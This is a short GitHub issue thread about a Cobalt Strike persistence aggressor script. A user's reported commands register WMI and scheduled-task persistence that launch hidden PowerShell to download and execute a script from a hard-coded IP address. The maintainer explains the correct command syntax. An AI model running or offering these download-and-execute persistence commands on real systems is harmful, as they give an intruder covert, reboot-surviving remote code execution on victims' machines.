### ISSUE TITLE
Is not working?

### ISSUE THREAD

**Issue by sucof** [ZonkSec/persistence-aggressor-script#1]
Hi, I test this persistence script,but is not working for me, my test environment were showed below:

cobalt strike 3.3 trial, victim is win7 sp1 32bit, and commands are:
1.persistence Add WMI OnStart powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://124.127.69.76:8080/b'))" test1; (beacon have admin)
2.persistence Add SchTasks OnIdle powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://124.127.69.76:80/a'))" test2;

when reboot the victim, is not connect to the cobalt strike, I need to run powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://124.127.69.76:8080/b'))" manully.

where are wrong?

thanks!

**Comment by ZonkSec** [comment]
Your commands are not correct. If you would like to add WMI persistence using my script, the command would be: `persistence Add WMI OnStart`, you do not need those additional parameters. As long as you have a PowerShell Web DriveBy running and there are no errors, that should work. Read my blog post for more information: http://www.zonksec.com/blog/persistence-aggressor-script/
